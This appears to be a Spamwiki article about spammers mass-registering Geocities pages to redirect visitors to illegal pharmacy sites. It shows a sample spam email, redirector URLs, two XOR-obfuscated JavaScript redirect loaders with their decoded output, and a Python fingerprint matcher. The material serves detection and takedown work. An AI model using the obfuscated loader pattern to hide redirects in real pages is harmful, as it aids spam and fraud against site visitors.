Geocities
From Spamwiki
Background
Yahoo! owns the Geocities offering, a free website provider for home pages and blogs. This offering allows users to register new sites to set up their own site or blog. Because there are no restrictions, anyone can set up any number of sites for no charge.
Once a site is created, the user can simply redirect any visitor to a different web site, so a Yahoo! Geocities page can act as a plain redirector to a spammed site. What is the advantage to spammers? Many of the tools that exist today to report spamvertized web sites look at the link in the spam message and report it to the IP address owner (ISP) or to the registrar. When the registrars receive these requests, they may remove or suspend the site because it infringes their Terms of Service. But spammers can create automated scripts that create a new Geocities registration every minute of every hour of every day, and as of March 2008 that is exactly what is happening. Spam runs can now cycle through thousands of redirection names at Geocities, confident that by the time a complaint has gone in to Yahoo! and the redirection has been checked and removed by Yahoo! staff, the damage has already been done: they have moved on to spamming the other thousands of new sites. As the spam runs arrive at various spam traps, these geocities.com redirections can be accumulated and reported. One excellent site performing this service is URIBL.COM.
Sample redirections
The usual redirection target sites are all examples of the Canadian Pharmacy operation; each was linked to its McAfee SiteAdvisor page.
For example, these Geocities sites redirect to the Canadian Pharmacy site industryegg.com:
- geocities.com/adamsmaynard89
- geocities.com/lorettafierros350475
- geocities.com/olivermcintosh38
- geocities.com/sharilong29
- geocities.com/reidmcconnell80
- geocities.com/teddycampbell49
Sample Spam
Return-Path: <opfpsalms@burbidgeandmitchell.com>
Received: from edge5.adelphia.net ([61.185.202.118]) by mta6.adelphia.net
(InterMail vM.6.01.05.02 201-2131-123-102-20050715) with ESMTP
id <20080503164506.RQUK21044.mta6.adelphia.net@edge5.adelphia.net>;
Sat, 3 May 2008 12:45:06 -0400
Received: from [210.72.148.218] (really [61.185.202.118])
by edge5.adelphia.net
(InterMail vG.2.00.00.02 201-2161-108-103-20050713) with ESMTP
id <20080503165035.EQB1743.edge5.adelphia.net@[210.72.148.218]>;
Sat, 3 May 2008 12:50:35 -0400
Message-ID: <001101c8ad81$0a4ffda0$00de72a4@WWW7EE2BF3DA56>
From: "Isiah Bower" <opfpsalms@burbidgeandmitchell.com>
To: "obfuscated" <obfuscated@adelphia.net>
Subject: New pharm items
Date: Sun, 4 May 2008 00:51:51 +0800
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_000E_01C8AD81.0A4FFDA0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2720.2963
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2720.2963
X-EsetId: 4793932BEBD6303712D7
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=Windows-1252">
<META content="MSHTML 6.00.2720.2963" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<BR><BR><BR>
<DIV align=left><FONT face=Georgia color=#FF0033 size=5><EM>Becoming a man has always wanted to be</EM></DIV>
<DIV><FONT face=Georgia size=4></FONT> </DIV>
<DIV align=left><FONT face=Georgia color=#000066 size=4>Not so good place to buy pills?...</FONT></DIV>
<BR><BR>
<DIV align=left><FONT face=Georgia color=#000066 size=4>The best prices you ever seen...</FONT></DIV>
<BR>
<DIV align=left><FONT face=Georgia size=4><A href="http://geocities.com/erickrodriquez23">Limited offer here...</A></FONT></DIV>
<DIV><FONT face=Georgia size=4></FONT> </DIV>
</BODY></HTML>
--- End of Mail Submission ---
Analysis of redirections
Sample 1
http://geocities.com/robertbarber61/
loads site: http://us.geocities.com/robertbarber61/index.html
The fetched page contains this JavaScript (the hex string is shown joined onto one line):
var crfxd='lsbyfleuboftmegvoxgvb';   // XOR key; a random string that differs from page to page
var heiupdk=0;                       // current position in the key
// hex-encoded, XOR-obfuscated HTML
var dbxetp, plhk, oedko='5000010B0F1C11550E0E081318040013525A2D17140D20010B0F1C11575C180F1A090A10581B1717580E0310030D0F030B5B0A1D03124D584751070C130658435C071814180D101A0E05004306081B48435B59110F010B091252';
plhk='';                             // accumulator for the decoded text
var ixhr;
for( dbxetp=0; dbxetp < oedko.length; dbxetp+=2){
  ixhr = unescape( '%' + oedko.substr( dbxetp,2));     // one hex pair -> one character
  plhk += String.fromCharCode( ixhr.charCodeAt(0) ^ crfxd.charCodeAt(heiupdk++) );
  if ( heiupdk >= crfxd.length ) heiupdk = 0;        // wrap around to the start of the key
}
document.write(plhk);                // injects the decoded script into the page
which decodes to:
window.top.location.href = 'http://earthexact.com';
which redirects the browser to an illegal Canadian Pharmacy web site.
Sample 2
http://geocities.com/mariomoon81/
loads site: http://us.geocities.com/mariomoon81/index.html
The fetched page contains this JavaScript (the hex string is shown joined onto one line):
var mbgcnit='iagitkdmlhaod';         // XOR key; different from Sample 1
var scgyyva=0;                       // current position in the key
// hex-encoded, XOR-obfuscated HTML
var hdepof, lnkgo, itzkqv='5512041B1D1B104D00090F0811080602545621051B0D3B021D0D1915455703020A09031F4F1B0B194F0B06170A100403064F07160C074754544C0C1918185B404B0C00151D1C0E1C0C0F1C4F0C0B04465C555B18071F05181551';
lnkgo='';                            // accumulator for the decoded text
var mqazm;
for( hdepof=0; hdepof < itzkqv.length; hdepof+=2){
  mqazm = unescape( '%' + itzkqv.substr( hdepof,2));   // one hex pair -> one character
  lnkgo += String.fromCharCode( mqazm.charCodeAt(0) ^ mbgcnit.charCodeAt(scgyyva++) );
  if ( scgyyva >= mbgcnit.length ) scgyyva = 0;      // wrap around to the start of the key
}
document.write(lnkgo);               // injects the decoded script into the page
which decodes to:
window.top.location.href = 'http://earthexact.com';
which redirects the browser to an illegal Canadian Pharmacy web site.
Fingerprint
Note that although the variable names and the XOR key in the JavaScript differ between pages that perform identical redirections, the coding logic is the same. It is therefore simple to build a fingerprint of the redirection code, and that fingerprint can be used to detect and remove all such obfuscated redirections.
var mbgcnit='iagitkdmlhaod';         // XOR key (random per page)
var scgyyva=0;                       // position in the key
// hex-encoded, XOR-obfuscated HTML (random per page)
var hdepof, lnkgo, itzkqv='5512041B1D1B104D00090F0811080602545621051B0D3B021D0D1915455703020A09031F4F1B0B194F0B06170A100403064F07160C074754544C0C1918185B404B0C00151D1C0E1C0C0F1C4F0C0B04465C555B18071F05181551';
lnkgo='';                            // accumulator for the decoded text
var mqazm;
for( hdepof=0; hdepof < itzkqv.length; hdepof+=2){       // fixed structure: step through hex pairs
  mqazm = unescape( '%' + itzkqv.substr( hdepof,2));
  lnkgo += String.fromCharCode( mqazm.charCodeAt(0) ^ mbgcnit.charCodeAt(scgyyva++) );   // fixed: XOR with cycling key
  if ( scgyyva >= mbgcnit.length ) scgyyva = 0;
}
document.write(lnkgo);               // fixed: write the decoded text into the page
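As an added example (not part of the wiki page), here is a Python fingerprint matcher and decoder for the loop above: it strips whitespace and matches the loop's structure with backreferences, so both samples from the Analysis section (embedded as constructed inputs with their hex payloads joined onto one line) match despite their different identifiers, and it then replays the XOR to recover the redirect target. The function names `analyse` and `decode` are my own.

```python
import re

# Constructed test inputs: the two Geocities pages analysed above, with each hex
# payload joined onto one line and the accumulator initialised to '' as it must be
# for the loop to run. Identifiers are the random ones from the samples.
SAMPLE1 = """var crfxd='lsbyfleuboftmegvoxgvb';
var heiupdk=0;
var dbxetp, plhk, oedko='5000010B0F1C11550E0E081318040013525A2D17140D20010B0F1C11575C180F1A090A10581B1717580E0310030D0F030B5B0A1D03124D584751070C130658435C071814180D101A0E05004306081B48435B59110F010B091252';
plhk='';
var ixhr;
for( dbxetp=0; dbxetp < oedko.length; dbxetp+=2){ixhr = unescape( '%' + oedko.substr( dbxetp,2));
plhk += String.fromCharCode( ixhr.charCodeAt(0) ^ crfxd.charCodeAt(heiupdk++) );
if ( heiupdk >= crfxd.length ) heiupdk = 0;
}document.write(plhk);"""
SAMPLE2 = """var mbgcnit='iagitkdmlhaod'; var scgyyva=0;
var hdepof, lnkgo, itzkqv='5512041B1D1B104D00090F0811080602545621051B0D3B021D0D1915455703020A09031F4F1B0B194F0B06170A100403064F07160C074754544C0C1918185B404B0C00151D1C0E1C0C0F1C4F0C0B04465C555B18071F05181551';
lnkgo=''; var mqazm; for( hdepof=0; hdepof < itzkqv.length; hdepof+=2){mqazm = unescape( '%' + itzkqv.substr( hdepof,2));
lnkgo += String.fromCharCode( mqazm.charCodeAt(0) ^ mbgcnit.charCodeAt(scgyyva++) );
if ( scgyyva >= mbgcnit.length ) scgyyva = 0; }document.write(lnkgo);"""

# Structural fingerprint of the decoder loop. Whitespace is stripped before matching,
# so layout and the random identifiers do not matter; the backreferences insist that
# each name is reused exactly where the loop reuses it (keys containing whitespace
# would be altered by the stripping; the samples use letters only).
# Groups: 1 key var, 2 XOR key, 3 key index, 4 accumulator, 5 payload var, 6 hex.
FINGERPRINT = re.compile(
    r"var(\w+)='([^']+)';var(\w+)=0;var\w+,(\w+),(\w+)='((?:[0-9A-Fa-f]{2})+)';"
    r"\4='';var\w+;for\(\w+=0;\w+<\5\.length;\w+\+=2\)\{"
    r"\w+=unescape\('%'\+\5\.substr\(\w+,2\)\);"
    r"\4\+=String\.fromCharCode\(\w+\.charCodeAt\(0\)\^\1\.charCodeAt\(\3\+\+\)\);"
    r"if\(\3>=\1\.length\)\3=0;\}document\.write\(\4\);")

def decode(hex_payload, key):
    """Replicate the loop: every payload byte XORed with the key, reused cyclically."""
    data = bytes.fromhex(hex_payload)
    return "".join(chr(b ^ ord(key[i % len(key)])) for i, b in enumerate(data))

def analyse(js):
    """Return (xor_key, decoded_text, redirect_target) if js matches the fingerprint,
    else None; redirect_target is None if the decoded text sets no location.href."""
    m = FINGERPRINT.search(re.sub(r"\s+", "", js))
    if not m:
        return None
    decoded = decode(m.group(6), m.group(2))
    t = re.search(r"location\.href\s*=\s*'([^']+)'", decoded)
    return m.group(2), decoded, (t.group(1) if t else None)

if __name__ == "__main__":
    for sample in (SAMPLE1, SAMPLE2):
        print(analyse(sample))
```

Both samples decode to the page's href statement wrapped in a script element, which is what document.write injects.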
Remedies
Section 5 (MEMBER CONDUCT) of the Yahoo! Geocities Terms of Service contains clauses that these redirections violate, and section 12 (TERMINATION) gives Yahoo! the right to terminate. Yahoo! Geocities therefore has both a legal right to terminate all of these violations and a legal obligation to do so (see the Geocities Terms of Service, especially section 12, Termination).
The fingerprint method described above must be applied on a continuing basis, to remove all previously spammed Geocities redirection sites and any newly registered sites that adopt the same method.
Reporting Geocities violations
There is an online page for reporting abuse.
Related redirection abuse
The URIBL tracking site allows a comparison between Yahoo! Geocities abuse rates and those of other free site providers such as Google Blogspot.

